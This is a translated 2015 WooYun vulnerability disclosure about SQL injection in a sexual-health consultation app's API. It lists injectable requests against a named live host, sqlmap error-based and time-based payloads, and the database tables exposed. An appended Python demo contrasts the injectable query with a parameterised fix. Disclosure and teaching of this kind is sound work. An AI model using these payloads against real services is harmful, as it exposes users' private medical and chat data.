Vulnerability Summary

Defect ID: wooyun-2015-0108610

Title: 两性私人医生 (a sexual-health "private doctor" app): super SQL injection bundle, user information and chat records laid bare

Vendor: ranknowcn.com

Author: 路人甲

Submitted: 2015-04-17 18:40

Fix time: 2015-04-22 18:42

Disclosed: 2015-04-22 18:42

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2015-04-17: details sent to the vendor, awaiting the vendor's handling
2015-04-22: vendor actively ignored the vulnerability; details disclosed to the public

Summary:

3.12 million user records and 21.22 million chat records, plus contract data. Staggering!

Details:

The bundle is as follows; (*) marks the injectable parameter in each request:

1.
POST /api/m.php?randnum=0.3436146208550781 HTTP/1.1
Content-Length: 307
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=chatend&chatid=(*)
2.
POST /api/m.php?randnum=0.404921563109383 HTTP/1.1
Content-Length: 355
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&password=(*)&username=(*)
3.
POST /api/m.php?randnum=0.07986594829708338 HTTP/1.1
Content-Length: 341
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=logout&userid=(*)
4.
POST /client/api.php?randnum=0.30327599309384823 HTTP/1.1
Content-Length: 418
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=chatnow&doctorid=(*)&pagename=msg&source=&sourceid=e&sourcetype=reply&userid=&usertype=user
5.
POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 361
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&number=(*)&ver=1.3
6.
POST /client/api.php?randnum=0.2865705310832709 HTTP/1.1
Content-Length: 359
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=593noraoim5jr0upjq2r31e8k4
Host: medapp.ranknowcn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
action=login&number=e&password=(*)&ver=1.3
7.
http://medapp.ranknowcn.com/client/image.php?key=(*)

Proof:

[Screenshot 2.png: sqlmap output, transcribed below]


---
Parameter: key (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: key=' AND (SELECT 4808 FROM(SELECT COUNT(*),CONCAT(0x7176787071,(SELECT (ELT(4808=4808,1))),0x7178786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AYzU'='AYzU
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: key=' AND (SELECT * FROM (SELECT(SLEEP(5)))eThy) AND 'AyNZ'='AyNZ
---
web application technology: Nginx, PHP 5.3.5
back-end DBMS: MySQL >= 5.0.0
current user is DBA: False
available databases [3]:
[*] information_schema
[*] lucky_draw
[*] medapp
Database: lucky_draw
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| quotaQuestionSearch_static | 8409865 |
| quotaQuestionSearch_static2 | 1668219 |
| question_bak_20140826 | 984870 |
| chat_bak_20140826 | 914996 |
| answer_bak_20140826 | 913774 |
| `360search_sendurl_log` | 209444 |
| hospitalSellLog_updLog_bak1 | 131155 |
| sellLog | 82301 | -----------------> logs
| sellLog_bak2 | 82110 |
| sellLog_bak1 | 74940 |
| searchHospital_keshi | 67054 |
| hospitalSellLog_invalidChat | 36319 |
| hetong | 3265 |
| searchHospital_hospital | 2771 |
Database: medapp
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| chathistory | 21220288 | ---------> 21.22 million chat records
| chatsourceLog | 18372907 |
| userAddrdetail | 15648638 |
| jihuo | 12418129 |
| iospush | 12005034 |
| userVisitLog | 9016552 |
| ios_xyz | 5330339 |
| record | 5000392 |
| ios_xyz2 | 4968693 |
| ios_xyz2_copy2 | 4961188 |
| quotaQuestionSearch | 4727017 |
| userDeviceid | 3822977 |
| logs_question | 3231583 |
| `user` | 3126644 | ---------------> 3.12 million users
| question | 2665491 |
| question_all | 2571617 |
| chat | 2487796 |
| answer | 2485376 |
| logs_doctorlogin | 2243382 |
| ios_xyz2_copy | 1313491 |
| addrdetailLog | 1159968 |
| questionCountForDate | 734583 |
| logs_users | 656968 |
| temp_questions | 617653 |
| jihuo_macaddr | 590965 |
| hospitalSellLog_updLog | 558268 |
| gps_raw_data | 499429 |
| gps_cell | 365384 |
| gps_wifi | 342661 |
| iptable | 300132 |
| userAlias | 262960 |
| bj_base_station | 250502 |
| chatcomment | 236696 |
| chatclose | 224087 |
| chatchange | 161348 |
| chatUpdLog | 142630 |
| meiapp_mm_vote | 122459 |
| gps_pos | 117181 |
| quotaQuestion_test | 113152 |
| question_repeatLog | 105996 |
| uploadFile | 89077 |
| ios_xyz2_copy1 | 88297 |
| quotaQuestion | 86733 |
| publicQuestion | 82896 |
| userLeaveWords | 71036 |
| jihuoCountForDate | 69885 |
| cityhospital_keshi | 67054 |
| user_copy | 45704 |
| iospushmsg | 43265 |
| booking | 39305 |
| logs_hospital | 34670 |
| meiapp_news | 30347 |
Some further sensitive information is not pasted here.

Fix:

Staggering; fix it urgently!
Requesting 20 rank!
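As an added illustration, not part of the original report and not the vendor's code, the following Python script models the image.php?key= lookup against an in-memory SQLite database: a string-concatenated query of the kind sqlmap found, beside the parameterised form that fixes it. It drives both with a generic tautology suffix and with the time-based blind payload from the sqlmap output in the proof section. The table and column names (images, img_key, path), the sample rows and the SLEEP stand-in are assumptions; MySQL's SLEEP() is replaced by a registered SQLite function that only records its calls, so nothing waits. The error-based payload is not reproduced because it depends on MySQL-only behaviour (ELT, the FLOOR(RAND(0)*2) duplicate-key trick).

```python
import sqlite3

# Constructed sample data standing in for the site's image table. The table
# and column names (images, img_key, path) are assumptions, not taken from
# medapp.ranknowcn.com.
SAMPLE_ROWS = [
    ("k1", "/upload/a.jpg"),
    ("k2", "/upload/b.jpg"),
    ("k3", "/upload/c.jpg"),
]

# Time-based blind suffix copied from the sqlmap output in the proof section;
# a generic tautology suffix is added for the data-exposure case.
TIME_BASED_SUFFIX = "' AND (SELECT * FROM (SELECT(SLEEP(5)))eThy) AND 'AyNZ'='AyNZ"
TAUTOLOGY_SUFFIX = "' OR 'AyNZ'='AyNZ"


class SleepSpy:
    """Stand-in for MySQL's SLEEP(): records each call and returns 0 without
    waiting, so the demo shows whether attacker-controlled SQL ran rather
    than measuring a delay."""

    def __init__(self):
        self.calls = []

    def __call__(self, seconds):
        self.calls.append(seconds)
        return 0


def make_db():
    """In-memory SQLite database with the constructed rows and the SLEEP stand-in."""
    conn = sqlite3.connect(":memory:")
    spy = SleepSpy()
    conn.create_function("SLEEP", 1, spy)
    conn.execute("CREATE TABLE images (img_key TEXT, path TEXT)")
    conn.executemany("INSERT INTO images VALUES (?, ?)", SAMPLE_ROWS)
    return conn, spy


def lookup_vulnerable(conn, key):
    """The shape of an injectable image.php?key= handler: the parameter is
    pasted into the SQL text, so a quote in it ends the string literal."""
    sql = "SELECT path FROM images WHERE img_key = '" + key + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, key):
    """Parameterised form: the value is bound by the driver and never parsed
    as SQL, whatever it contains."""
    sql = "SELECT path FROM images WHERE img_key = ?"
    return [row[0] for row in conn.execute(sql, (key,))]


def demo():
    """Run both handlers against both payloads and report what happened."""
    conn, spy = make_db()
    out = {}

    # Tautology: the vulnerable handler returns every row, the safe one none.
    out["vuln_tautology"] = lookup_vulnerable(conn, TAUTOLOGY_SUFFIX)
    out["safe_tautology"] = lookup_safe(conn, TAUTOLOGY_SUFFIX)

    # Time-based blind, appended to a valid key so the AND chain is reached.
    # The vulnerable handler executes SLEEP(5) (recorded by the spy); the row
    # is then filtered out because SLEEP() returns 0. The safe handler only
    # looks for a key that does not exist and never evaluates SLEEP.
    out["vuln_time_based"] = lookup_vulnerable(conn, "k1" + TIME_BASED_SUFFIX)
    out["vuln_sleep_calls"] = list(spy.calls)
    spy.calls.clear()
    out["safe_time_based"] = lookup_safe(conn, "k1" + TIME_BASED_SUFFIX)
    out["safe_sleep_calls"] = list(spy.calls)
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The same split applies to every request in the bundle: chatid, userid, username, password, number and doctorid all need to be bound parameters rather than pasted into query text. In the PHP stack the proof identifies, that means mysqli or PDO prepared statements with placeholders for each of these parameters, together with casting numeric IDs to integers before use; escaping alone does not cover the numeric contexts (chatid, userid, doctorid) where no quotes surround the value.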

Copyright notice: when reposting, credit the source 路人甲@乌云


Vendor Response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-04-22 18:42

Vendor reply:

Rank: 15 (WooYun assessment)

Latest status:

2015-04-22: Thanks. Too many vulnerabilities have been submitted recently, so this one was missed and confirmation is a bit late.